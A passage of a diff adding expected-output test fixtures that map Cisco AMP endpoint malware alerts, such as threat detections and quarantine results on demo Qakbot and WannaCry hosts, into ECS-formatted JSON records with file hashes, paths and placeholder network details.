+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419275390665097296",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:59:38.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500141093Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6411525251028484000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6411525251028484105",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:59:38.000Z",
+            "file": {
+                "name": "MspthrdHash.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe",
+                "hash": {
+                    "sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c",
+                    "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff",
+                    "md5": "6894b3834bd541fa85df79e44568acac"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff",
+                    "6894b3834bd541fa85df79e44568acac",
+                    "8cf0ca99a8f5019d8583133b9a9379299c45470c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500143175Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":214000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6411525251028484000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6411525251028484105",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:59:38.000Z",
+            "file": {
+                "name": "MspthrdHash.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe",
+                "hash": {
+                    "sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c",
+                    "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff",
+                    "md5": "6894b3834bd541fa85df79e44568acac"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff",
+                    "6894b3834bd541fa85df79e44568acac",
+                    "8cf0ca99a8f5019d8583133b9a9379299c45470c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500145233Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6411525251028484000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6411525251028484104",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:59:38.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500147317Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6411525251028484000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "detection_id": "6411525251028484104",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:55:47.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500149522Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6419264043361501000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419264043361501262",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:55:47.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500151606Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6419264043361501000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419229331435814969",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:55:47.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500153674Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6419264043361501000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419204905956802579",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:55:47.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500155748Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine",
+                "id": "6419264043361501000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419264043361501261",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648155
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T16:55:47.000Z",
+            "file": {
+                "name": "u.wnry",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry",
+                "hash": {
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500157824Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6419264043361501000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Ransom:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
